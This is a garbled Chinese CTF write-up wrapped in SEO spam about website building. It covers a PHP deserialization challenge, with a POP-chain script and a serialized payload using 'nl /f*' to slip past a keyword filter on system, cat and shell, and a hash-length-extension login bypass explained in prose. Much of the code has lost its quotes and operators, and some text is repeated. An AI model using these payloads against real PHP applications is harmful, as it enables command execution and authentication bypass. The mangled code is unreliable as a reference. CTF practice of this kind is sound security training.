橱柜网站源码,正规的app网站开发,广东省网页制作,哪家做的濮阳网站建设1、eaaeval
查看源码能看见账号#xff1a;username169#xff0c;密码#xff1a;password196提交这个用户密码可以跳转到页面/dhwiaoubfeuobgeobg.php
通过dirsearch目录爆破可以得到www.zip
?php
class Flag{public $a;public $b;public function __construct(){…1、eaaeval
查看源码能看见账号username169密码password196提交这个用户密码可以跳转到页面/dhwiaoubfeuobgeobg.php
通过dirsearch目录爆破可以得到www.zip
?php
class Flag{public $a;public $b;public function __construct(){$this-a admin;$this-b admin;}public function __destruct(){if(!preg_match(/flag|system|php|cat|tac|shell|sort/i, $this-a) !preg_match(/flag|system|php|cat|tac|shell|sort/i, $this-b)){system($this-a. .$this-b);}else{echo again?;}}
}
$wzbz $_GET[wzbz];
unserialize($wzbz);
?system($this-a. .$this-b);这里可以命令执行使anlb/f*绕过正则
pop链
?php
class Flag{public $a;public $b;public function __construct(){$this-a nl;$this-b /f*;}
}
$fnew Flag();
echo serialize($f);
?
得到O:4:Flag:2:{s:1:a;s:2:nl;s:1:b;s:3:/f*;}
payload wzbzO:4:Flag:2:{s:1:a;s:2:nl;s:1:b;s:3:/f*;} 2、upload_shell ?php
session_start();
highlight_file(__FILE__);
include ./my.php;
echo strlen($secret);
echobr;
echo(md5($secret.adminpassword));
$username urldecode($_POST[username]);
$password urldecode($_POST[password]);
if (!empty($_COOKIE[source])) {if ($username admin $password ! password) {if ($_COOKIE[source] md5($secret.$username.$password)) {// 在验证用户后如果登录成功设置会话变量来表示用户已登录$_SESSION[loggedin] true;$_SESSION[username] admin; // 用户名$_SESSION[role] admin; // 用户角色或权限echo scriptwindow.location.hrefupload.php;/script;}else {echo br; die (你的cookie好像不太对啊);}}else {die (可不会轻易放你进去);}
}14
879bd10c8628894d388c068a25326c21
看别人的wp得知这里使用了哈希拓展攻击
我们注意到md5($salt“adminroot”)e6ccbf12de9d33ec27a5bcfb6a3293df对于未知salt的MD5或SHA-1哈希哈希长度拓展攻击可以被用来构造一个新的有效哈希值从而绕过原有的认证。这是因为MD5和SHA-1算法的哈希函数存在一个特定的性质给定一个消息M和其哈希值H可以很容易地计算出一个新的消息M使得M的哈希值为任意指定的值H。
哈希拓展攻击Hash Length Extension Attack是一种针对使用哈希函数进行消息认证的协议或应用的攻击方式。
哈希函数是将任意长度的输入数据映射为固定长度的输出具有唯一性、不可逆性和抗碰撞等特性。在正常情况下应用程序或协议会对消息进行哈希运算并将哈希值与消息一起传输或存储以实现消息的完整性验证。然而在一些哈希函数中如MD5和SHA-1等较旧的哈希算法存在一个安全漏洞即哈希拓展攻击。攻击者可以通过已知的哈希值和一些补充数据称为扩展数据使用特定的方法生成新的哈希值而无需知道原始数据的内容。
具体来说攻击者可以利用已知的哈希值H通过在原始消息M的末尾添加扩展数据E并对新的消息M||E进行哈希运算得到新的哈希值H。这个新的哈希值H可以被认为是对新消息M||E的完整性验证而不需要知道原始消息M的内容。哈希拓展攻击可能导致认证绕过、身份伪造、篡改数据等安全问题。